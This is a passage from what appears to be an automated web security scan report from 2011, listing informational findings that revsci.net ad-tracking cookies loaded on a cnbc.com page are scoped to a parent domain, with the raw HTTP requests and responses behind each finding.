rsi_us_1000000="pUM14zlDOBYUrmdq3jOQH6NG/UTjJLypNPMu8j89fd7oQaFd0CGE6g8BwU8BLTkNk43VN7eq0QNSW3IUk+uTvqu8auJ2S2LZxpSpL8eGphT60G4prmTdfiezinEAD9kyC3KCRbDpqtLxi1GGWRPFRBWPmsyfWUjCJrI/qeyKNuYezzwaOTHL33oaGCBioxiqR8W+4dk8WlvGZ9YvAlu1X62jzEUa/z0lcEx/fgX1rp6SmNviSVxl++79bYXbtO6KucPNV+o0spA9X5lrhoQvfmEXBs+I8U9rTeD7XaLGPTLjF4gEW1jA+aO7uXh6RAnsdClJw2jS40PC8jc23yB7BcLiJJ+OhPRVY+vyRbc3J0Sjm8Sz67E/L874xBIECN3DZdE2/kgkrcWH4hVZlgjL3clq8qtbKRw3w4RICoh0rlsQq+Ji88/+6j4ebeyV3y4wgSowXIafj9f666mlyCMHcXYbXKf94BvZJyhwBadxW3r1D+t4lSfjEKN2JuUzop91v8tJRB70XNLlYsw/MkJZi22ULyISe8ahLjb8sNldZApNk6/LapLMars7OKRyiv+SwnON/l0biBj1z09uyjkDTBp2KxazCTxtWeGuoFIbJR10BWEwGi7YDQrx5CqZTHRQuS2Ay697tB3Ohu+AxT2lucy9dS+HeE75ff3CpS3wjmVWXECKsGM64q49RRdF0KT4wfEeGMhZWNrrUFYKVdngicK6Dud4YX+7wfgYPEKiQ23jXy+XYHabTkco7B1vgSEVNm677u4a0/I2XBk6u/MkW0NKNoAeAKIhp2CsFvAQXLyeuAd+hzWpra1O8ZqlnGFs4V0gxt/UCNXXGuuwnVi5SHRw3gj9QMjEbsgOeBmtNRxaLDMjfoG9G3TbLim8TBZ2e+fcuf/Ly9/9vYOXqDb5QWgifsf8NRUlsEeC7E0yuEb97hLpClnOexQyL3ehXpI5vl8DdfIsLpI4UvIDrwu4tJqVGTIuTtc/ojyzz3EzYUo3PdwUDaRz3ICnF6Tj6bp7uypyFgWaLLbmj10c2Hww4b3j7N5KvHWYi2NdFRIrvUXvH8w6armbaYgIkkcVhIOWxyJLQzawIA6Wse6WelO911T7C2Sleu7nWmKjddrtaiU5qWHWcWpOgncZiuCU7/ENIa8dmB9cLMbgnGjd6/7alxT+ycZseW7ceg/fjcNyZZT7u8IAEEgcQwUMeppxR0RIcCsJTPkyJWnEZEhCvi5xTtBF8ZIbYTvUtXCOzWvvqOTyOZrYxDQ8kntd5MF2n9YqPsTsy6SeRAr3KcR/dbTFHNuue2j69mFlNRSsmT031UKoY0JcJsSbEQrNuytkC0zQ7fHo9YLMpBJutxC99LIv6cMTTpcSvl3lR/llOMDpLVBianiJYXm1MOZ4X9aC78xe91tRk3SgiE9A/BpZ5tK+StSu9MigStE/nbwnHvSJi6TY61JfgUVrpxxlegdgnbovL3MSLfoIhqdgdcTdqA/BsZizgTO+1vETUHG3eMqedBr0lUs7qxiPKfVhiF9YjDOnrIz5P9uggoO5nSnxu0fSjQ8xbsnGyE6BoRJOXBAPWyzt8jyrqUDcWY/apJscfHMeFNIP+jH8dC+8sXI/Vk65JJoD0SBLD2Dd/f2wdp8cqYrc9fblRiDeHjMjwhyU27E0TxISr+ufmmmyNZ5UMCNm/GURd4/pMt5n8Mh5aDzrovIoCIh4Q5s+C6t+0B++b7O9ny6IOfOfa0yT0BN1ZRRQHjk3nxgL9yu00ZMihKjAQY8sKHtYHYT30DBFjEceegnD1g=="; rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rsB4rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabwcAaYOpnyIK0cTktT+ixZURa1DGnHu9PnMc1auc8rlJuRBO2IqsTXy/5vtSquBaHfTOe7YLMo+ZnVB+ywH/bUTVGVQXbXPuK8P7W2RjjYs4enDYeWXhjriypfjxvHkFvxvX4VXsMcQ5xnwEUjm/Wvf9e5HgUGlh96WSaVmao/X/al95QBitEuTc2sbHMr/3p257punu0CTBZkiS31ZUQI1rnykVwY0byNXDFThSHpzAWe3Zq5rXptvD/V/c/Gkyl8C3r+zAHBEvqYRDnBPjM3NTtF9+HpYj0pODlF7g38XQRCkqqkSbP3BW+WtxMJfXNIYt8Ikg0slJMsv4EHPBRTja8PJL33HyFHevQEDpRoMWtk+5EdEF+RYEwMhtqkV8tWe/WqCpOjhxZie+yUoLnATaw+vKf8IaWxJPZ0zUN9N+h6Unu/7w3rz5dqHuYcjb1soyILRWGICEJoCUShCE83doE5nPJC7WWC2xMOKNIlreQ6WGMlII41ZSAcL7WmRs2Rfo5orNMc=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uzs22rMriQJ4Ym1N1EuC/pV+zq2jLxL9z1pFHcD2oMpIyt/lxMhiEmSOkHFIHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2qjpCay/9h6Y4N/vrTyarBrZy/5p1vkVo6HLAj5TEabu+hT6vIheCK3a3RumjiC3vPwuMZAz/Fb6dCVvlO9Aw5pwWF9+EAAeV2TzsgUGaQv/2ZQe8rRPH5+5M9R39Ral+qP2V0y/+p2zRg1hLjVsjl1uwVWfKX77O/YPBY7dk2EjwvOdsWypIoh5qvkdbyxlttmCesrPwFb3/F6egiCumX5QrgmivUjRchduzfmZbwpTxy48V0WNVX4PvVH5gTOeAh2tnOpYIRwgMo1Y55QogoAQ+LrZpfryua2rcBmooHEc/TPGSsRiiDTykHRSaRMKCZmWMl334vqqCDsgfxTkfFRDJiwmuN0wq2iNRtk37UWndpoYVv1oFEpCVZNQU4C1q6lU5uQwGrTGJkFYxk+SOGtNllWGDyeMeLcz6EXlCQLXUM45YSnoRE/CFCdK49wepWGR2w0OLPEDVjNdOOen2Iuk5ZAbz6ympB6lcs/X3NM0=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:56:17 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 17:56:17 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.196. http://pix04.revsci.net/I10985/b3/0/3/1008211/814191239.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/814191239.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpH9F28xHaWooScWoFISWonfb5T4sxUmX+r1XZ7sL50d/kuZA/wB4kkYzSDmmigS0klIKQl8bq4XH6tE2Dcioboe+cnDDJZgKgtQtXa1p7mjRWANNLdKKeG16kloGw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:55:22 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /I10985/b3/0/3/1008211/814191239.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%253F_rsiL%253D0%26DM_REF%3Dhttp%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860%26DM_EOM%3D1&C=I10985 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_H07707=82f4957c1a652091&H07707&0&4dfc9b6b&0&&4dd62389&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I07714=82f4957c1a652091&I07714&0&4e047730&0&&4ddc9a7b&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05539=82f4957c1a652091&K05539&0&4e047732&1&10592&4dddf043&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e04773b&0&&4dddd39f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_B08725=82f4957c1a652091&B08725&0&4e047743&0&&4dde0faf&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E05516=82f4957c1a652091&E05516&0&4e047779&0&&4dddf225&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e04da55&4&10004,10009,10016,10017&4ddf3979&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_C07583=82f4957c1a652091&C07583&0&4e065339&0&&4de08ea4&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06543=82f4957c1a652091&A06543&0&4e091f12&0&&4de303e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K05540=82f4957c1a652091&K05540&0&4e0bcd60&0&&4de5e0dc&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_L09855=82f4957c1a652091&L09855&0&4e0bd03c&0&&4de5b5e6&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A06546=82f4957c1a652091&A06546&0&4e0d143b&0&&4de6f601&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F10931=82f4957c1a652091&F10931&0&4e0dae7d&0&&4de84145&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e1adc2a&2&10055,10194&4df57f23&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=MLv3NzMJZjpnHtrXN5qKIC+r++BQc/UqXr6jBV8rYdQ2D2XTncAIbXi2tfypgqfJvateR9HJ4U08Qnt4Q2fIWiATrGjjYlnmNAcpRXld8nmx6VM+uG+xOukp7j3BXwCS+Luv7Iuhg7/XvJ35U6jPutiAWAtPb3VwRE0DesH0KA0i0eMjcVNUP7mp7BMGp+B/EGjVdYGzWqUknsvKweFT+/IFuGMHAsu+afJ2kQXBxwEXEnI284PCB7hzurlburO7x14hGsWFzj8KUtk9jQcjtZkMIKSy3mn1V8am+dxz7UodZWG00rBYYRZ0cjlSDFYadKnlaFZl4WjQWkWRDqKEZH59Ut9twiQUx1iXCG8iFmI23cdID0H8ErMZAAE9/iEW5Yjc/hsRxFefezjBeBN1Ocjx3hzzVxkcq9wXVCW7v9gjbPES9RIEJjX6rn9tQMgTqBUTCp516rrWgoESvRqsitgEQSw3RmRhZBJdy4iqp4/JObA7C03jVIHHd/OgUUtxL0I0IbsQQqVUXpCGyO4rskRuwHM1KU/Jbepu/3y3XB4F9Lpy9Ufx6j6TSc6J96HphMM85TwXx7fD13QYz5YKzM2Txz12JQmdrq1UZPM96lln/Tfbv2urd8XVBeiI1PTpV/L69BK1Xr+RcfbDf0XR9SagilEdfA6T2TJyH9iMhcnhz1NWY+qhlDxMPSQaFcD6mD4u9+aPdPJnLGY78YS0lsmAzuY++q+UmVQ9O8MuuZfRn1viBcFYPPO/Ehb77dTJg0wIZ8rAgaA9RmflsAck2uy+gTZ349vcjqFpcMwaqqwB5WRmMPQJfweVMtTvWPkkuS9FWQ4pNWS5KxqAkGqf3hsSys/hL24QuN0Suhcm3H/ZLfDFTqH/XhIvPbQmPRq/T9/Oc+GUdIt7rL3IepeiBMujgm4x4y9De6/SXY/1G/dfg6gVmY7m2ZuGE7hYkw+0BL1/z3Zw9Hnzz70tcwPvezpWza85RkoiRR4+8BSNSbxgqdKTjuNKkY//8VMIWdyl4Z2G2dbxHMzBp97k+fXUncflugKR6WJ8lFLHcEzV81qBR501CzuBtIGsDgXjenf/x2WgwCSnHkndwCiBiUknGxwx+S2SpubYRjjXHCy9bwvmSmxTUa1b7VEsSrnPYypigb/zefKrVe0UPipLc5LkWDwWtg7FYvNKgWyrLb87NYz/h9VK0yntvka2xKvG4ZXqdf37tzjnNpWV2mpNmVbXTWnwQHwFdwd1rTkyP4UI2q6Kw6oi7YOb0U5adnK36hSUia4WXRH2RwYHsCn0svKj/kHV8m1eqgqrQs3jbnuX9y2EErURl7rwma3gtd6vJ/wuhcNtKGMY3enJXaQADSqbB0spsB4qUnmbZSLzuv8rqi9HbmRhdSm4YgYqeFLp+fAJwyT0LvsXIBVraanECinitRCiTcdsUjy+Iclhq+jG7T5SGgSZwhcwPfeyy8ger2ZfuAwEnnXpR8wMbYlvC194xV4LyY+q2jPozoQcLN4gSBMEGMEwQW6I05fTMiQJwrZSC/RUdb37nldhcv/9IDt9kHI9GPKzBVhEKgbqLPQFxzg45maBZPvKUGezRmdPo4ypTAmYk/f442D28FM08AcSOkW9r56J6aLrI8/7DOBzqz3qW0U6I7gh9MbOFpXcdo0Z0AZYacCAtKnx5lwhc0/3MJQtviHwhIF9xJZUcl5GaheXf4FEovMiK7s8zlGYnWDNAXdyBWOCn7utL6sxfF81wN9Lx/wXDh5B8xgAqQd5CojbH/a9VJDCKq6ASCHPQToFEBSV4oYY5ylpm4uijSLLmA+3NzrSUmfaX5StLZBQgT/162m/K8Xv8D/g1I5tSdEUSPPRbPD6PDTK+hieE+mG8gEYRqblqpGfYRizEg==; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; rtc_YxMN=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; rsiPus_nkS4="MLsXtSMNZzhvJZE469JExPALrEtuUCF+EhmSre0boSoIybh8eM9OR5om4StALLGlSzKo6Yk2BjeUPsfVs6urDya8a0/qNJhC5Uldg8KjeIzpW928CY/0OixkZQD7sCDZSgJRUqSiq1cNENFE3yHIPMbarmxNg+FfHDCNM+AI1dedg7vy47AimjmfCyP3N8x8nof0nNyDHW+uvpoItc6JskaNk/7wKLo/uDmAyvgQsJ1eOByds1pyMoiHVRvE6RAchO9GuwdCQbmXPmr7xq9moy6XPiakvCmkziOI9mFiwXZHgL/lbWX3HYRcngPAvzEetbFfmqWZdGWIRzgmwlAs4PE5HhO1N3d4YEiuuK1tlpHLALSKuXNjVMtSGfCrH1bvomV6o8HsgldDh/zBALvEuG0mdGoLUsjbr25yWcp3flWt3lWav1ZGo0ARz6kygDXtYTJT5CicZ3R8AMccdliCDG0AUBfkKKuGpiANWqN8XyhRY6haU6bDtvXqbRO+ilkbVNPix4UL4WFj98QNt9C9DG/awuEnlHBuQpiLngdn8cJfLAMyM2+Jdz48joQR4i39Sv4fgKUGEifOvjOAJyBTr+9+2Hph3xRidV95UXwRFUjw9CC46HBuH8mx9Da9+2wqiIxXpcOaHtfNVYshATbaZp90alqO61bCBI4PHXdbqm53hh5MUdT1thl4zyIbEIDzMtl0DcKgzy9Ru5VvVhdta0ZVeQXIixDl7UFRMJRgF3Ot5GZ4ru79IwAR1JwE3S61xDJS1O0/sKacu88F1XeHaG+Nnez0bL3MQy4b2LvNL+tKligCLsUdGwJdRB8ej82ByoTV5lpu9nqFPmFPqMYQhJ+Bw7RfhukXdqBHuLQ+ZxJCxCvSfGLEP/SxNc88rtMVg9NfqKkKob/lmLHQLTS6bg22piEzgFHJIk2bx0sznb765a2mi5DtMDpbiX/BIF7vXOWYKBzjYec09uemqpla/PWlsYtZeUVuW2grV+9A10TJbTotOFij4OWqRPE0+8cK8HiISFbQulaZuTWiMhRy5O0P1DfRTk+qJh9Do79VaHAgZy0H0W4KhdujHIWeSC0M/Fte+0O44zuwpLFSixqcpOPH1JQtwxoRWMbMx/KfKmD1VkOltrqcUMlmQHD2e6Bk+VwXSADcX7RM/wBpaDJpw7Jjp7BjOpJPWscCZTnBxjUZEF6TiRHDsgQUFc7mjOiQLSd6fj8EuyhEsCvF4+XSFlVtkU/mIjhmGg6WKAwY9UaugjDrXuwns1AEyJTyG5wlkCNX+c48cAO2SAM6ZzRzPCcM/+hZWFXSWNV/QRVQ3IS/sEYqf0Xo5mEobL9qRdZHbYD8XDaIHCJaCYaj9QUyrSEX98Sn"; rsi_us_1000000="pUM14zlHMBYUrmdq3jPYZZchxO5zLew7+sxQfpQZWKOFEc0Nn+NzghdKC1j3sHCMgNlXx3bukFx5JXMKLKuPBfCyTBwFcx1p0KVPDkPmVGeU6kcJ7yLe1jAKzHEyJ0c1OrmWAvegmZjxa4SsT3pqdKOhH7XY0QbTb5R+dnWDAc1Pbw5/L6RTLtIHemZgs3Y2UxE4NpeUlqGPYPHHIaLif3c48dcaYs7U7RrG6HLUB4TPLZW1UoBkdUnRsMRXELuvAYdIRY9DOtr1JxLtExJ+39X+3njOLVdCdO69JMYjxZA6/uEDPF/vHf/G7WXxx03vdwluNpBbF01X/8jsCpMR4c0y7zxtfWbjdYWw02E038tJ2rTLz1KEBrEmjqJzs5rtR8eedphrKb9B7lKanknYMaj6Kg1rG10F8PIrXd+FEBwL1pws1xWzxzjvM1kFOVcW9YQYpp1nVnzuk8aGJaVll8j/YnWUGbApxT65Z5ZJB/FdJQsEUCwMiGTm6cr/PtV6S+0QPXMMYPW7n3hHevm3ChZPVb0T8CtUhtW+g6lLMQGamRvMSihAmDCKrTrQuDf9nHGpPxgT9vhtdcKAcAFCM4y1T7DrdXHjXX0B52mjq8ZLCMQExZNRKPEKrq2uVTKc9PVahYGZv9jhY7/dpmdVBekyTBXnVBPjVDz7b4J1xgpvPorCVSA0fBlcgn7A7EL9Yd3xGxcv4f56hBJ+IwrF70AXRgrlf439utP6NGwh3Zjl24NhAdN3ID3pwxsFw4W16z5GtV5iuApv+izTuRCW1Yo163U7Fgpj7j2nebvVZXxwQxM/ITWO7rd0toTFxOmQ0ZrgFo7yLhszcNFnE8Ih4+vwrjUDgt0WTO2jPooNIZWqmd+5MSp+D7stbYLrpC8BpvGxvybFb9aMU0GBjJeJqrv/VnS13xrNz5Cs+OZ66JyNAcHDY8XRsx7bjMeBRS2lG46Udf6M1JW4mZIFb/h5C4ZNCO8IV2mwp0R+xi0lSfmOSsobQut40tp2Td+t/K1aVU20+FptjEP1pnpAwAiyhfQ6O6CbHt0wF9h/DatbZ942J9elD0Rmp9LU0ituiKtAnHfE5Onmr4vZpE8JitVfnriUsR7xX0lmqbeQfLJoaAluaQ46U5QXoLQRakkshAUqVRSXpcT8wAWabnHqAjXevBY3cez2Ge1g3zB95wN0NNFOYM/t7+UBgYrYSgwI6goCndBlzQio02K455kIVVyc2VwPPfC0h4ZbuMsUjaapVwx9h1lVy1capdeiqiLWZvZCuv6Lj6HGQybGWD1Kd35illAYTUS42S6eKIeFJxgWviuHYyGgDbjwuxLX6SYtrXL6rSorl33omnGm95Gd/Z+lkPwkT3urlOsVn/8lwr3imbbeQa9+g5CWFYGK8tyZF1qfLOGV7R5okh3VkvlAOLo4xn/sXNvvSBjU/NxP1Ijjkf63xGBcgazZHHZsrWMcRfum6IbypzvmQWXXsMgCXcM9qdcWCmCMThAMkwY4yLEciOHSZDeNQfVcxVNsv0ppApCvr5VHfOQKovoVZagXyk9kuWNCVDBnkwyVID3lRZkHF6M/Z0oQ/uy/51nvzWWBrUtzvyNdqiq2WVmBN9KeMffZhnatk85m2rGb2AkvGfG+W69/bIYzyvXe3zv7t5IP69IUWtD3M1k3ebSG+JPmKx2t8NpUzs8fr2OzaFHWOUBh2biDc/H4Mfaqh3EjIv9gaBaV0ATQvL57olAtaUgpn8le/LMy+et+B3XEeGpOccXc5mPq0tGhWNf6skWU8LDA1ZFz5mEQvw=="; rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpH9F28xHaWooScWoFISWonfb5T4sxUmX+r1XZ7sL50dfpT/3yJpT7qjRECODDnaNjDw+Y00QAVcAmzxwHjFD/A8MFcKuHPZ0gu0mqt7yq2hVsp6u/gbje6nJyNoFw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6WA1BOLiIf9dkzrU5cE72ZWc00qW9MXKl/yabXGZBe8iih22KEfajJ8TbmgLZkF3VJULSxXOsKgbLSYGygtQN54egzBWSJbEl9R/Hk7emp9CxqGU21BjlvfqFEzHuAYT+0RMmU8yDn8fMKd76Sem/n1/A45enPmYXILccTgptCeFmnyrhXnmwcWGfPLM7ivdDuO5LCNTcsLU/YXpH9F28xHaWooScWoFISWonfb5T4sxUmX+r1XZ7sL50d/kuZA/wB4kkYzSDmmigS0klIKQl8bq4XH6tE2Dcioboe+cnDDJZgKgtQtXa1p7mjRWANNLdKKeG16kloGw==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:55:22 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 14:55:22 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

10.197. http://pix04.revsci.net/I10985/b3/0/3/1008211/821864121.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/821864121.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

